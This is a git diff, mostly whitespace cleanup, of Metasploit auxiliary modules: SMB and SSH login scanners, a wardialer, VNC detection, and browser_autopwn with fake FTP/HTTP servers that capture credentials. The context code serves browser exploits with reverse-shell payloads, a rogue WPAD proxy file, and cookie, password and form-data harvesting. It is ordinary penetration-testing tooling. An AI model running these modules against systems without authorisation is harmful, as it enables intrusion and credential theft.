report_note( :host => pkt[1], @@ -160,6 +160,6 @@ class Metasploit3 < Msf::Auxiliary data << "User-Agent: #{suser}\r\n" data << "Accept: text/plain\r\n" end - + end diff --git a/modules/auxiliary/scanner/smb/pipe_auditor.rb b/modules/auxiliary/scanner/smb/pipe_auditor.rb index 4b5069695b..2a5567e83f 100644 --- a/modules/auxiliary/scanner/smb/pipe_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB - + # Scanner mixin should be near last include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'SMB Session Pipe Auditor', @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'hdm', 'License' => MSF_LICENSE ) - + deregister_options('RPORT') end @@ -60,17 +60,17 @@ class Metasploit3 < Msf::Auxiliary 'PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER', 'db2remotecmd' ] - + # Fingerprint a single host def run_host(ip) pass = [] - + [[139, false], [445, true]].each do |info| datastore['RPORT'] = info[0] datastore['SMBDirect'] = info[1] - + begin connect() smb_login() @@ -83,13 +83,13 @@ class Metasploit3 < Msf::Auxiliary # print_error("Could not open \\#{pipe}: Error 0x%.8x" % e.error_code) end end - + disconnect() break rescue ::Exception => e # print_line($!.to_s) - # print_line($!.backtrace.join("\n")) + # print_line($!.backtrace.join("\n")) end end @@ -97,6 +97,7 @@ class Metasploit3 < Msf::Auxiliary print_status("#{ip} - Pipes: #{pass.map{|c| "\\#{c}"}.join(", ")}") end end - + end + diff --git a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb index b4ea97c578..1fbd886eb0 100644 --- a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,10 +18,10 @@ class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB include Msf::Exploit::Remote::DCERPC - + # Scanner mixin should be near last include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'SMB Session Pipe DCERPC Auditor', @@ -30,12 +30,12 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'hdm', 'License' => MSF_LICENSE ) - + deregister_options('RPORT', 'RHOST') register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER)", 'BROWSER']), - ], self.class) + ], self.class) end @@target_uuids = [ @@ -255,7 +255,7 @@ class Metasploit3 < Msf::Auxiliary [ 'fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0' ], [ 'ffe561b8-bf15-11cf-8c5e-08002bb49649', '2.0' ] - + ] # Fingerprint a single host @@ -265,15 +265,15 @@ class Metasploit3 < Msf::Auxiliary datastore['RPORT'] = info[0] datastore['SMBDirect'] = info[1] - + begin connect() smb_login() @@target_uuids.each do |uuid| - + handle = dcerpc_handle( - uuid[0], uuid[1], + uuid[0], uuid[1], 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] ) @@ -283,10 +283,10 @@ class Metasploit3 < Msf::Auxiliary rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e # print_line("UUID #{uuid[0]} #{uuid[1]} ERROR 0x%.8x" % e.error_code) rescue ::Exception => e - # print_line("UUID #{uuid[0]} #{uuid[1]} ERROR #{$!}") + # print_line("UUID #{uuid[0]} #{uuid[1]} ERROR #{$!}") end end - + disconnect() return @@ -295,6 +295,6 @@ class Metasploit3 < Msf::Auxiliary end end end - + end diff --git a/modules/auxiliary/scanner/smb/smb2.rb b/modules/auxiliary/scanner/smb/smb2.rb index 52c3bbcf06..c3726a3fa5 100644 --- a/modules/auxiliary/scanner/smb/smb2.rb +++ b/modules/auxiliary/scanner/smb/smb2.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary SIMPLE = Rex::Proto::SMB::SimpleClient XCEPT = Rex::Proto::SMB::Exceptions CONST = Rex::Proto::SMB::Constants - + def initialize super( 'Name' => 'SMB 2.0 Protocol Detection', @@ -35,12 +35,12 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'hdm', 'License' => MSF_LICENSE ) - + register_options([ Opt::RPORT(445) ], self.class) end # Fingerprint a single host - def run_host(ip) + def run_host(ip) begin connect @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary print_status("#{ip} supports SMB 2.0") end end - + rescue ::Rex::ConnectionError rescue ::Exception => e print_error("#{rhost}: #{e.class} #{e} #{e.backtrace}") diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 6e37eaffab..2f706edaa3 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -142,9 +142,9 @@ class Metasploit3 < Msf::Auxiliary print_status("#{rhost} - FAILED LOGIN (#{smb_peer_os}) #{user} : #{pass} (#{e.error_reason})") disconnect() - return :next_user # These reasons are sufficient to stop trying. + return :next_user # These reasons are sufficient to stop trying. end - + if(simple.client.auth_user) print_good("#{rhost} - SUCCESSFUL LOGIN (#{smb_peer_os}) '#{user}' : '#{pass}'") report_hash = { diff --git a/modules/auxiliary/scanner/snmp/aix_version.rb b/modules/auxiliary/scanner/snmp/aix_version.rb index a3a3429017..478d2520a6 100644 --- a/modules/auxiliary/scanner/snmp/aix_version.rb +++ b/modules/auxiliary/scanner/snmp/aix_version.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index c3fac8d365..d8b97ca5ff 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -30,14 +30,14 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. - If you have loaded a database plugin and connected to a database - this module will record successful logins and hosts so you can - track your access. + If you have loaded a database plugin and connected to a database + this module will record successful logins and hosts so you can + track your access. Note that password-protected key files will not function with this module -- it is designed specifically for unencrypted (passwordless) keys. - + Key files may be a single private (unencrypted) key, or several private keys concatenated together as an ASCII text file. Non-key data should be silently ignored. @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary # Needs an end next unless key =~ /\n-----END [RD]SA PRIVATE KEY-----\x0d?\x0a$/m # Shouldn't have binary. - next unless key.scan(/[\x00-\x08\x0b\x0c\x0e-\x19\x80-\xff]/).empty? + next unless key.scan(/[\x00-\x08\x0b\x0c\x0e-\x19\x80-\xff]/).empty? # Add more tests to taste. keepers << key end @@ -218,7 +218,7 @@ class Metasploit3 < Msf::Auxiliary when :missing_keyfile vprint_error "#{ip}:#{rport} - SSH - Cannot read keyfile." when :no_valid_keys - vprint_error "#{ip}:#{rport} - SSH - No cleartext keys in keyfile." + vprint_error "#{ip}:#{rport} - SSH - No cleartext keys in keyfile." end end end diff --git a/modules/auxiliary/scanner/telephony/wardial.rb b/modules/auxiliary/scanner/telephony/wardial.rb index d90fea981d..38daca54c2 100644 --- a/modules/auxiliary/scanner/telephony/wardial.rb +++ b/modules/auxiliary/scanner/telephony/wardial.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -20,7 +24,7 @@ class Object file.close return obj end - + def self.load_from_file filename begin file = Zlib::GzipReader.open(filename) @@ -57,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('INITSTRING', [true, 'Initialization String', 'AT X6 S11=80']), OptString.new('SERIALPORT', [true, 'Serial Port (e.g. 0 (COM1), 1 (COM2), /dev/ttyS0, etc.)', '/dev/ttyS0']), ], self.class) - + register_advanced_options( [ OptInt.new( 'BaudRate', [true, 'Baud Rate', 19200]), @@ -102,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary @confdir = File.join(Msf::Config.get_config_root, 'wardial') @datadir = File.join(Msf::Config.get_config_root, 'logs', 'wardial') - + # make sure working dirs exist FileUtils.mkdir_p(@confdir) FileUtils.mkdir_p(@datadir) @@ -214,7 +218,7 @@ class Metasploit3 < Msf::Auxiliary dialval = unidentified[chosen][1] end print_status("#{unidentified.size} of #{dialrange.size} numbers unidentified, #{num_carriers} carriers found, #{num_faxes} faxes found, #{num_busy} busy") - if dialval[:busy] == true + if dialval[:busy] == true print_status("Dialing: #{dialnum} (#{dialtimeout} sec. timeout, previously busy)") else print_status("Dialing: #{dialnum} (#{dialtimeout} sec. timeout, previously undialed)") @@ -371,7 +375,7 @@ class Metasploit3 < Msf::Auxiliary return true end - + def build_dialrange(dialmask) dialrange = {} @@ -427,7 +431,7 @@ class Metasploit3 < Msf::Auxiliary if Time.now >= gotchar + 8 # nudges after 8 seconds of receiving nothing if nudgestring print_status( "Nudging..." ) - modem.puts nudgestring + modem.puts nudgestring end gotchar = Time.now # resets timer so we don't nudge too often end diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index e3efc98c10..c7e62fc4e2 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -36,11 +36,11 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) begin - + # Create an unbound UDP socket if no CHOST is specified, otherwise # create a UDP socket bound to CHOST (in order to avail of pivoting) - udp_sock = Rex::Socket::Udp.create( - { + udp_sock = Rex::Socket::Udp.create( + { 'LocalHost' => datastore['CHOST'] || nil, 'Context' => { diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index 91e6f0634c..444891129f 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'VNC Authentication None Detection', @@ -41,9 +45,9 @@ class Metasploit3 < Msf::Auxiliary begin banner = sock.get_once(50,1) - # RFB Protocol Version 3.3 (1998-01) - # RFB Protocol Version 3.7 (2003-08) - # RFB Protocol Version 3.8 (2007-06) + # RFB Protocol Version 3.3 (1998-01) + # RFB Protocol Version 3.7 (2003-08) + # RFB Protocol Version 3.8 (2007-06) if (banner and banner =~ /RFB 003\.003|RFB 003\.007|RFB 003\.008/) ver,msg = (banner.split(/\n/)) @@ -60,12 +64,12 @@ class Metasploit3 < Msf::Auxiliary if (msg =~ /Too many security failures/) msg = msg + ". " + "Wait for a moment!" end - print_status("#{target_host}:#{rport}, VNC server warning messages : \"#{msg}\"") - else + print_status("#{target_host}:#{rport}, VNC server warning messages : \"#{msg}\"") + else # send VNC client protocol version cver = ver + "\x0a" sock.put(cver) - + # first byte is number of security types num_types = sock.get_once(1).unpack("C").first if (num_types == 0) @@ -80,14 +84,14 @@ class Metasploit3 < Msf::Auxiliary # 16 : Tight (tightvncserver) # 17 : Ultra # 18 : TLS - + sec_type = [] if types sec_type << "None" if (types.include? 1) sec_type << "VNC" if (types.include? 2) - sec_type << "Tight" if (types.include? 16) + sec_type << "Tight" if (types.include? 16) sec_type << "Ultra" if (types.include? 17) - sec_type << "TLS" if (types.include? 18) + sec_type << "TLS" if (types.include? 18) print_status("#{target_host}:#{rport}, VNC server security types supported : #{sec_type.join(",")}") if (types.include? 1) print_status("#{target_host}:#{rport}, VNC server security types includes None, free access!") diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index 92c236df42..390f7a647c 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -25,9 +25,9 @@ require 'rex/exploitation/javascriptosdetect' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Client Automatic Exploiter', 'Version' => '$Revision$', 'Description' => %q{ @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary techniques to fingerprint HTTP clients and then automatically exploit them. }, - 'Author' => + 'Author' => [ # initial concept, integration and extension of Jerome # Athias' os_detect.js @@ -45,46 +45,46 @@ class Metasploit3 < Msf::Auxiliary 'Actions' => [ [ 'WebServer', { - 'Description' => 'Start a bunch of modules and direct clients to appropriate exploits' + 'Description' => 'Start a bunch of modules and direct clients to appropriate exploits' } ], [ 'DefangedDetection', { - 'Description' => 'Only perform detection, send no exploits' + 'Description' => 'Only perform detection, send no exploits' } ], - [ 'list', { + [ 'list', { 'Description' => 'List the exploit modules that would be started' } ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'WebServer', 'DefangedDetection' ], 'DefaultAction' => 'WebServer')) register_options([ - OptAddress.new('LHOST', [true, + OptAddress.new('LHOST', [true, 'The IP address to use for reverse-connect payloads' ]), ], self.class) register_advanced_options([ - OptString.new('MATCH', [false, + OptString.new('MATCH', [false, 'Only attempt to use exploits whose name matches this regex' ]), - OptString.new('EXCLUDE', [false, + OptString.new('EXCLUDE', [false, 'Only attempt to use exploits whose name DOES NOT match this regex' ]), - OptBool.new('DEBUG', [false, + OptBool.new('DEBUG', [false, 'Do not obfuscate the javascript and print various bits of useful info to the browser', false ]), - OptPort.new('LPORT_WIN32', [false, + OptPort.new('LPORT_WIN32', [false, 'The port to use for Windows reverse-connect payloads, default is 3333' ]), - OptPort.new('LPORT_LINUX', [false, + OptPort.new('LPORT_LINUX', [false, 'The port to use for Linux reverse-connect payloads, default is 4444' ]), - OptPort.new('LPORT_MAC', [false, + OptPort.new('LPORT_MAC', [false, 'The port to use for Mac reverse-connect payloads, default is 5555' ]), - OptPort.new('LPORT_GENERIC', [false, + OptPort.new('LPORT_GENERIC', [false, 'The port to use for generic reverse-connect payloads, default is 6666' ]), ], self.class) @@ -110,14 +110,14 @@ class Metasploit3 < Msf::Auxiliary print_status("Found #{@exploits.length} exploit modules") elsif (action.name == 'DefangedDetection') exploit() - else + else start_exploit_modules() if @exploits.length < 1 print_error("No exploits, check your MATCH and EXCLUDE settings") return false end exploit() - end + end end @@ -131,11 +131,11 @@ class Metasploit3 < Msf::Auxiliary function make_xhr() { var xhr; - try { - xhr = new XMLHttpRequest(); + try { + xhr = new XMLHttpRequest(); } catch(e) { - try { - xhr = new ActiveXObject("Microsoft.XMLHTTP"); + try { + xhr = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { xhr = new ActiveXObject("MSXML2.ServerXMLHTTP"); } @@ -271,7 +271,7 @@ class Metasploit3 < Msf::Auxiliary else lport = @gen_lport payload='generic/shell_reverse_tcp' - end + end @payloads[lport] = payload print_status("Starting exploit #{name} with payload #{payload}") @@ -281,9 +281,9 @@ class Metasploit3 < Msf::Auxiliary # For testing, set the exploit uri to the name of the exploit so it's # easy to tell what is happening from the browser. if (datastore['DEBUG']) - @exploits[name].datastore['URIPATH'] = name + @exploits[name].datastore['URIPATH'] = name else - @exploits[name].datastore['URIPATH'] = nil + @exploits[name].datastore['URIPATH'] = nil end @exploits[name].datastore['LPORT'] = lport @@ -312,7 +312,7 @@ class Metasploit3 < Msf::Auxiliary end - def start_exploit_modules() + def start_exploit_modules() @lhost = (datastore['LHOST'] || "0.0.0.0") @js_tests = {} @@ -338,12 +338,12 @@ class Metasploit3 < Msf::Auxiliary apo[:vuln_test] = "" apo[:ua_name] = HttpClients::IE if apo[:classid].kind_of?(Array) # then it's many classids - apo[:classid].each { |clsid| + apo[:classid].each { |clsid| apo[:vuln_test] << "if (testAXO('#{clsid}', '#{method}')) {\n" apo[:vuln_test] << " is_vuln = true;\n" apo[:vuln_test] << "}\n" } - else + else apo[:vuln_test] << "if (testAXO('#{apo[:classid]}', '#{method}')) {\n" apo[:vuln_test] << " is_vuln = true;\n" apo[:vuln_test] << "}\n" @@ -351,7 +351,7 @@ class Metasploit3 < Msf::Auxiliary end if apo[:ua_minver] and apo[:ua_maxver] - ver_test = + ver_test = "!ua_ver_lt(detected_version.#{@init_js.sym("ua_version")}, '#{apo[:ua_minver]}') && " + "!ua_ver_gt(detected_version.#{@init_js.sym("ua_version")}, '#{apo[:ua_maxver]}')" elsif apo[:ua_minver] @@ -420,14 +420,14 @@ class Metasploit3 < Msf::Auxiliary @js_tests.each { |browser,tests| tests.sort! {|a,b| b[:rank] <=> a[:rank]} } - + @noscript_tests.each { |browser,tests| tests.sort! {|a,b| b[:rank] <=> a[:rank]} } end - def on_request_uri(cli, request) + def on_request_uri(cli, request) print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}") case request.uri @@ -453,7 +453,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Responding with exploits") response = build_script_response(cli, request) end - + cli.send_response(response) when %r{^#{self.get_resource}.*ns=1} # This is the request for the exploit page when javascript is NOT @@ -470,7 +470,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Responding with non-javascript exploits") response = build_noscript_response(cli, request) end - + response["Expires"] = "0" response["Cache-Control"] = "must-revalidate" cli.send_response(response) @@ -607,7 +607,7 @@ class Metasploit3 < Msf::Auxiliary } else { test = "try {" + test + "} catch (e) { is_vuln = false; }; is_vuln"; } - //alert("next_exploit(" + (exploit_idx).toString() + ") => " + + //alert("next_exploit(" + (exploit_idx).toString() + ") => " + // global_exploit_list[exploit_idx].resource + "\\n" + // test + " -- " + eval(test) //); @@ -618,7 +618,7 @@ class Metasploit3 < Msf::Auxiliary #{js_debug("'this client does not appear to be vulnerable to ' + global_exploit_list[exploit_idx].resource + '<br>'")} next_exploit(exploit_idx+1); } - } catch(e) { + } catch(e) { next_exploit(exploit_idx+1); }; } @@ -699,9 +699,9 @@ class Metasploit3 < Msf::Auxiliary data_offset = request.uri.index('sessid=') #p request['User-Agent'] - if (data_offset.nil? or -1 == data_offset) + if (data_offset.nil? or -1 == data_offset) # then we didn't get a report back from our javascript - # detection; make a best guess effort from information + # detection; make a best guess effort from information # in the user agent string. The OS detection should be # roughly the same as the javascript version on non-IE # browsers because it does most everything with @@ -743,7 +743,7 @@ class Metasploit3 < Msf::Auxiliary @targetcache[key] ||= {} @targetcache[key][:updated_at] = Time.now.to_i - # Clean the cache + # Clean the cache rmq = [] @targetcache.each_key do |addr| if (Time.now.to_i > @targetcache[addr][:updated_at]+60) diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index 7e3e9368c4..10ba44365d 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Authentication Capture: FTP', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Capture' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -54,18 +54,18 @@ class Metasploit3 < Msf::Auxiliary def run exploit() end - + def on_client_connect(c) @state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil} c.put "220 FTP Server Ready\r\n" end - + def on_client_data(c) data = c.get_once return if not data cmd,arg = data.strip.split(/\s+/, 2) arg ||= "" - + if(cmd.upcase == "USER") @state[c][:user] = arg c.put "331 User name okay, need password...\r\n" @@ -76,10 +76,10 @@ class Metasploit3 < Msf::Auxiliary c.put "221 Logout\r\n" return end - + if(cmd.upcase == "PASS") @state[c][:pass] = arg - + report_auth_info( :host => @state[c][:ip], :proto => 'ftp', @@ -88,16 +88,16 @@ class Metasploit3 < Msf::Auxiliary :user => @state[c][:user], :pass => @state[c][:pass] ) - + print_status("FTP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}") end @state[c][:pass] = data.strip c.put "500 Error\r\n" return - + end - + def on_client_close(c) @state.delete(c) end diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 4bf2a750f7..55b41ed551 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Authentication Capture: HTTP', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Capture' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -43,15 +43,15 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]), - OptPath.new('TEMPLATE', [ false, "The HTML template to serve in responses", + OptPath.new('TEMPLATE', [ false, "The HTML template to serve in responses", File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "index.html") ] ), - OptPath.new('SITELIST', [ false, "The list of URLs that should be used for cookie capture", + OptPath.new('SITELIST', [ false, "The list of URLs that should be used for cookie capture", File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "sites.txt") ] ), - OptPath.new('FORMSDIR', [ false, "The directory containing form snippets (example.com.txt)", + OptPath.new('FORMSDIR', [ false, "The directory containing form snippets (example.com.txt)", File.join(Msf::Config.install_root, "data", "exploits", "capture", "http", "forms") ] ), @@ -67,24 +67,24 @@ class Metasploit3 < Msf::Auxiliary @sitelist = datastore['SITELIST'] @myhost = datastore['SRVHOST'] @myport = datastore['SRVPORT'] - + @myautopwn_host = datastore['AUTOPWN_HOST'] @myautopwn_port = datastore['AUTOPWN_PORT'] @myautopwn_uri = datastore['AUTOPWN_URI'] @myautopwn = false - + if(@myautopwn_host and @myautopwn_port and @myautopwn_uri) @myautopwn = true end - + exploit() end - + def on_client_connect(c) c.extend(Rex::Proto::Http::ServerClient) c.init_cli(self) end - + def on_client_data(cli) begin data = cli.get_once(-1, 5) @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Exception print_status("Error: #{$!.class} #{$!} #{$!.backtrace}") end - + close_client(cli) end @@ -110,22 +110,22 @@ class Metasploit3 < Msf::Auxiliary # Require to clean up the service properly raise ::EOFError end - + def dispatch_request(cli, req) - + phost = cli.peerhost - + os_name = nil os_type = nil os_vers = nil os_arch = 'x86' - + ua_name = nil ua_vers = nil - + ua = req['User-Agent'] - case (ua) + case (ua) when /rv:([\d\.]+)/ ua_name = 'FF' ua_vers = $1 @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary ua_name = 'Safari' ua_vers = $1 end - + case (ua) when /Windows/ os_name = 'Windows' @@ -148,17 +148,17 @@ class Metasploit3 < Msf::Auxiliary when /Mac OS X/ os_name = 'Mac' end - + case (ua) when /PPC/ os_arch = 'ppc' end - + os_name ||= 'Unknown' - + mysrc = Rex::Socket.source_address(cli.peerhost) hhead = (req['Host'] || @myhost).split(':', 2)[0] - + if (req.resource =~ /^http\:\/+([^\/]+)(\/*.*)/) req.resource = $2 hhead, nport = $1.split(":", 2)[0] @@ -167,8 +167,8 @@ class Metasploit3 < Msf::Auxiliary cookies = req['Cookie'] || '' - - + + if(cookies.length > 0) report_note( :host => cli.peerhost, @@ -176,7 +176,7 @@ class Metasploit3 < Msf::Auxiliary :data => hhead + " " + cookies ) end - + if(req['Authorization'] and req['Authorization'] =~ /basic/i) basic,auth = req['Authorization'].split(/\s+/) @@ -192,11 +192,11 @@ class Metasploit3 < Msf::Auxiliary ) print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}") end - - - if(req.resource =~ /^\/*wpad.dat|.*\.pac$/i) + + + if(req.resource =~ /^\/*wpad.dat|.*\.pac$/i) prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }" - res = + res = "HTTP/1.1 200 OK\r\n" + "Host: #{hhead}\r\n" + "Content-Type: application/x-ns-proxy-autoconfig\r\n" + @@ -206,9 +206,9 @@ class Metasploit3 < Msf::Auxiliary cli.put(res) return end - - - if(req.resource =~ /\/+formrec\/(.*)/i) + + + if(req.resource =~ /\/+formrec\/(.*)/i) data = Rex::Text.uri_decode($1).split("\x00").join(", ") report_note( @@ -216,14 +216,14 @@ class Metasploit3 < Msf::Auxiliary :type => "http_formdata", :data => hhead + " " + data ) - - res = + + res = "HTTP/1.1 200 OK\r\n" + "Host: #{hhead}\r\n" + "Content-Type: text/html\r\n" + "Content-Length: 4\r\n" + "Connection: Close\r\n\r\nBYE!" - + print_status("HTTP form data received for #{hhead} from #{cli.peerhost} (#{data})") cli.put(res) return @@ -234,12 +234,12 @@ class Metasploit3 < Msf::Auxiliary :type => "http_request", :data => "#{hhead}:#{@myport} #{req.method} #{req.resource} #{os_name} #{ua_name} #{ua_vers}" ) - + print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource} #{os_name} #{ua_name} #{ua_vers} cookies=#{cookies}") - + if(req.resource =~ /\/+forms.html$/) frm = inject_forms(hhead) - res = + res = "HTTP/1.1 200 OK\r\n" + "Host: #{hhead}\r\n" + "Content-Type: text/html\r\n" + @@ -248,19 +248,19 @@ class Metasploit3 < Msf::Auxiliary cli.put(res) return end - - + + # http://us.version.worldofwarcraft.com/update/PatchSequenceFile.txt if(req.resource == "/update/PatchSequenceFile.txt") - print_status("HTTP #{cli.peerhost} is trying to play World of Warcraft") + print_status("HTTP #{cli.peerhost} is trying to play World of Warcraft") end - - + + # Microsoft 'Network Connectivity Status Indicator' Vista if (req['Host'] == 'www.msftncsi.com') print_status("HTTP #{cli.peerhost} requested the Network Connectivity Status Indicator page (Vista)") data = "Microsoft NCSI" - res = + res = "HTTP/1.1 200 OK\r\n" + "Host: www.msftncsi.com\r\n" + "Expires: 0\r\n" + @@ -269,14 +269,14 @@ class Metasploit3 < Msf::Auxiliary "Content-Length: #{data.length}\r\n" + "Connection: Close\r\n\r\n#{data}" cli.put(res) - return + return end -=begin +=begin # Apple 'Network Status' Check (prevents a pop-up safari on the iphone) if(req['Host'] == 'www.apple.com' and req.resource == '/library/test/success.html') data = "\x3c\x21\x44\x4f\x43\x54\x59\x50\x45\x20\x48\x54\x4d\x4c\x20\x50\x55\x42\x4c\x49\x43\x20\x22\x2d\x2f\x2f\x57\x33\x43\x2f\x2f\x44\x54\x44\x20\x48\x54\x4d\x4c\x20\x33\x2e\x32\x2f\x2f\x45\x4e\x22\x3e\x0a\x3c\x48\x54\x4d\x4c\x3e\x0a\x3c\x48\x45\x41\x44\x3e\x0a\x09\x3c\x54\x49\x54\x4c\x45\x3e\x53\x75\x63\x63\x65\x73\x73\x3c\x2f\x54\x49\x54\x4c\x45\x3e\x0a\x3c\x2f\x48\x45\x41\x44\x3e\x0a\x3c\x42\x4f\x44\x59\x3e\x0a\x53\x75\x63\x63\x65\x73\x73\x0a\x3c\x2f\x42\x4f\x44\x59\x3e\x0a\x3c\x2f\x48\x54\x4d\x4c\x3e\x0a" - res = + res = "HTTP/1.1 200 OK\r\n" + "Host: www.apple.com\r\n" + "Expires: 0\r\n" + @@ -293,22 +293,22 @@ class Metasploit3 < Msf::Auxiliary if (req['Host'] == 'activex.microsoft.com') print_status("HTTP #{cli.peerhost} attempted to download an ActiveX control") data = "" - res = + res = "HTTP/1.1 404 Not Found\r\n" + "Host: #{mysrc}\r\n" + "Content-Type: application/octet-stream\r\n" + "Content-Length: #{data.length}\r\n" + "Connection: Close\r\n\r\n#{data}" 